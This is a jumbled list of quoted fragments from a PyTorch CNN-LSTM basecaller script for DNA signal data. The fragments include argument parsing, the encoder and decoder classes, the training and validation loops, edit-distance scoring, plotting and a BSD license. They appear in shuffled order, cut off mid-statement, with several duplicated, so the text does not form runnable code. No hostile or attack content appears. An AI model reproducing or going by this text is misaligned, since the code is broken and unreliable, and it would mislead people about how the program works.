"default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate",
"= {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 =",
"make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs))",
"= [] val_acc = [] val_editd = [] model.eval() total_ed = 0 total_num_chars",
"target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(),",
"num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True,",
"None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min')",
"n = matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b, idx]",
"n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port)",
"== reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if",
"model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else:",
"index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim]",
"val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize",
"dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2",
"CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED",
"\", update= \", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) #",
"= {} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train =",
"h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1,",
"= reshaped_sorted_labels != 5 # indices of not padded elements loss = criterion(reshaped_output,",
"pd import argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules')",
"default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides',",
"n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start,",
"# shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len,",
"1).contiguous() # input for LSTM seq_length x out_size # Calculate cross entropy loss",
"for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs.",
"__init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder,",
"h, c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start,",
"x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target)",
"labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x",
"loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0)",
"trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\"",
"#Wrap them in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y,",
"(updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio",
"not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :, i] # batch-i,",
"##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\")",
"clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder",
"f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4]))",
"= int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = [] for p",
"= np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for",
"= [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(),",
"# (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq,",
"self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through",
"{} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {}",
"0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30)",
"ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder",
"batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False)",
"train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation,",
"Redistributions of source code must retain the above copyright notice, this list of",
"% make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1,",
"dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model):",
"SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def",
"good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type,",
"print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename))",
"kernel size = 11 start = time.time() out12 = trainNet( model12, train_ds =",
"3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy",
"= own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout #",
"forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in",
"pass through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] # shape",
"dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention:",
"following disclaimer in the documentation and/or other materials provided with the distribution. THIS",
"\"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for epoch in",
"hundreds, e.g. [batch size] = 32 is a good default value CNN =",
"between 1 and a few hundreds, e.g. [batch size] = 32 is a",
"/ float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch]",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF",
"'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname),",
"position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i,",
"of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce",
"out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1,",
"BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,",
"attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port)",
"LSTM seq_length x out_size # Calculate cross entropy loss # output = (seq*batch,",
"lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name:",
"size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ###########################################",
"{} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {}",
"!= \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate",
"f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal",
"Redistribution and use in source and binary forms, with or without modification, are",
"requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len =",
"gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder)))",
"edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf",
"they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted =",
"PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR",
"to the last element in the batch if i == max_in_batch: break #",
"make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed",
"validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val],",
"USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY",
"batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop,",
"FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT",
"DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter",
"Sort instances by sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx",
"= {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights =",
"updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?',",
"end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate",
"param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4 # ordering ingate,",
"OF SUCH DAMAGE. \"\"\" import h5py import numpy as np import os import",
"for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs.",
"parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget",
"self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size,",
"training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds",
":] # sort labels so that they match with order in batch labels_sorted",
"n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len =",
"args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate",
"running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val",
"input input_decoder = label if teacher_force else onehot # [batch size, out dim]",
"= model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0,",
"directory file_out = script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as",
"def forward(self, x, hidden): h, c = hidden h = h.view(h.size(0), -1) c",
"reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train",
"f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length:",
"(ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy,",
"list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if",
"editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/",
"data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False),",
"default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers',",
"import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND",
"shape for input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size,",
"1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0",
"else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn =",
"batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False,",
"ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed)",
"= [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len)",
"index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path",
"= F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate *",
"divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer':",
"Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing if clipping_value",
"layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\"",
"for name in y_len: if \"bias\" in name and \"lstm\" in name and",
"# Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout)",
"seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max.",
"1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels",
"default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units",
"{:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100),",
"plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0],",
"= n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) #",
"batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else:",
"attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port)",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train,",
"file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem =",
"editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\")",
"writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the training iteration: print(\"=====",
"list of conditions and the following disclaimer in the documentation and/or other materials",
"label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping =",
"c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates =",
"TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\",",
"num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN,",
"{ 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path +",
"packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren #",
"if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) #",
"use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one",
"x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df,",
"True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS",
"unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the",
"# targets oder batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0,",
"= seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :]",
"optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port)",
"# one hot encode input input_decoder = label if teacher_force else onehot #",
"100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd #",
"y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len)))",
"NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,",
"CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number",
"if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for",
"as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden",
"(batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide",
"== 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in",
"writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if",
"'--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on",
"\"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds != None)",
"loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile =",
"= (forgetgate * c) + (ingate * cellgate) hy = outgate * F.tanh(cy)",
"train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port),",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # ----------- # *",
"random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest: seq,",
"nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds != None) and",
"Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] =",
"bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training",
"lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output =",
"(unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder",
"# Update encoder and decoder optimizer.step() if (val_ds != None) and (updates %",
"np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in p and",
"False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim",
"(torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2,",
":] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target,",
"############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn,",
"{} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {}",
"label = y[not_padded_batches, :, i] # batch-i, features, seq len y = y[not_padded_batches,",
"torch.autograd import Variable import torch.nn.functional as F import torchvision import pickle import random",
"break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val =",
"validation set val_losses = [] val_acc = [] val_editd = [] model.eval() total_ed",
"1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val,",
"[] for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred =",
"n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability",
"self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate =",
"c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) +",
"1 # one hot encode input input_decoder = label if teacher_force else onehot",
"b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases =",
"default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda",
"torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from",
"itertools import seaborn as sns import pandas as pd import argparse from distutils.util",
"input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets",
"11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\",",
"ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates",
"sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens",
"of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last",
"out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if",
"#if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train /",
"Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4:",
"Distance vs. updates from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)),",
"x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs =",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY",
"THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH",
"figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x",
"model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for",
"set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit",
"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY",
